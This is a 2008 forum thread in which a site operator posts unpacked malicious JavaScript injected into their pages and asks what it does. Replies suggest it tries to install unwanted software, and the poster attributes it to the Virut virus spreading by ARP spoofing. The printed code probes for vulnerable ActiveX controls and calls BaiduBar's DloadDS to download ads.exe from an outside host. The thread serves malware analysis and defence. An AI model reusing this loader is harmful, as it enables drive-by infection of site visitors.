Malicious JS code : 5 ActiveXObjects

Discussion in 'JavaScript' started by anjanesh, Jan 18, 2008.

  1. #1
    Hi

    Theres a malicious JS code getting injected into the pages in our network. It was packed (eval(packer function)) and after unpacking to see it contents, I see that it creates a whole of ActiveXObjects.

    Anyone have any clue as to what this may be doing ?
    What on earth is clsid:BD96C556-65A3-11D0-983A-00C04FC29E36 ?
    if (document.cookie.indexOf('OKSUN') == -1)
     {
            try
             {
                    var e;
                    var ado = (document.createElement("object"));
                    ado.setAttribute("classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");
                    var as = ado.createobject("Adodb.Stream", "")
             }
            catch(e){};
            finally
             {
                    var expires = new Date();
                    expires.setTime(expires.getTime() + 24 * 60 * 60 * 1000);
                    document.cookie = 'OKSUN=SUN;path=/;expires=' + expires.toGMTString();
                    document.write("<\/script>");
    
                    if(e != "[object Error]")
                     {
                            document.write("<\/script>")
                     }
                    else
                     {
                            try
                             {
                                    var f;
                                    var storm = new ActiveXObject("MPS.StormPlayer")
                             }
                            catch(f){};
                            finally
                             {
                                    if (f != "[object Error]")
                                    {
                                           document.write("<\/script>");
                                           document.write("")
                                    }
                             }
    
                            try
                             {
                                    var g;
                                    var pps = new ActiveXObject("POWERPLAYER.PowerPlayerCtrl.1")
                             }
                            catch(g){};
                            finally
                             {
                                    if (g != "[object Error]")
                                     {
                                            document.write("<\/script>");
                                            document.write("")
                                     }
                             }
    
                            try
                             {
                                    var h;
                                    var thunder = new ActiveXObject("DPClient.Vod")
                             }
                            catch(h){};
                            finally
                             {
                                    if (h != "[object Error]")
                                     {
                                            document.write("<\/script>");
                                            document.write("")
                                     }
                             }
    
                            try
                             {
                                    var i;
                                    var yahoo = new ActiveXObject("GLCHAT.GLChatCtrl.1")
                             }
                            catch(i){};
                            finally
                             {
                                    if (i != "[object Error]")
                                     {
                                            document.write("")
                                     }
                             }
    
                            try
                             {
                                    var j;
                                    var obj = new ActiveXObject("BaiduBar.Tool")
                             }
                            catch(j){};
                            finally
                             {
                                    if (j != "[object Error]")
                                     {
                                            obj.DloadDS("http://k.222360.com/ads/ads.cab", "ads.exe", 0);
                                            document.write("")
                                     }
                             }
    
                            if (f == "[object Error]" && g == "[object Error]" && h == "[object Error]" && i == "[object Error]" && j == "[object Error]")
                             {
                                    document.write("")
                             }
                     }
             }
     }
    PHP:
     
    anjanesh, Jan 18, 2008 IP
  2. MMJ

    MMJ Guest

    Messages:
    460
    Likes Received:
    12
    Best Answers:
    0
    Trophy Points:
    0
  3. joebert

    joebert Well-Known Member

    Messages:
    2,150
    Likes Received:
    88
    Best Answers:
    0
    Trophy Points:
    145
    #3
    Looks like it's attempting to create an instance of a video player, Baidu Search toolbar, or download an installer.
    Either to artificially inflate some numbers somewhere, or install some nastyware.

    That code itself is the least of your worries, how it got there is your primary concern.
     
    joebert, Jan 21, 2008 IP
  4. anjanesh

    anjanesh Well-Known Member

    Messages:
    344
    Likes Received:
    7
    Best Answers:
    0
    Trophy Points:
    165
    #4
    Apparently, this is a result of a Virut.AC virus which seems to be a case of ARP poisioning/spoofing
     
    anjanesh, Jan 21, 2008 IP